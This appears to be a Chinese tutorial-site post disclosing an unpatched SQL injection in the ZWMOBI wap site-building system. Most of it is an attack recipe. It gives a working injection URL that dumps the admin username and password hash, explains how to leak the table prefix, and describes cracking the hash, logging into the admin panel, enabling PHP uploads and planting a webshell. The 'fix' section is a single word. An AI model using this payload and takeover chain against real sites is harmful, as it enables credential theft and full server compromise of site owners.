网站地图    收藏   

主页 > 后端 > 网站安全 >

ZWMOBI wap建站系统注入及修复 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 0Day说明:变量过滤不严,导致MYSQL注入发生。漏洞利用:zwmobi.php?zwmobi=bbsviewV=21cid=12/**/union/**/select/**/1,1,1,1,username,password,1,1,1,1/**/from/**/表前缀_member/**/where/**/uid=1其中uid......

0Day说明:变量过滤不严,导致MYSQL注入发生。
 
漏洞利用:zwmobi.php?zwmobi=bbsview&V=21&cid=12/**/union/**/select/**/1,1,1,1,username,password,1,1,1,1/**/from/**/表前缀_member/**/where/**/uid=1
 
其中uid就是用户的uid,因为默认管理uid是1.表前缀请替换为实际的表前缀,默认是zwmobi,可以通过在 cid=12后面加一个单引号爆出。
 
 
修复:过滤
 
官方补丁:尚未发布
 
爆出来的MD5密码拿去破解,破解了在 admin_index.php登录,在后台配置的地方加个php类型的上传。然后点系统模块,软件管理,添加软件,传马

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论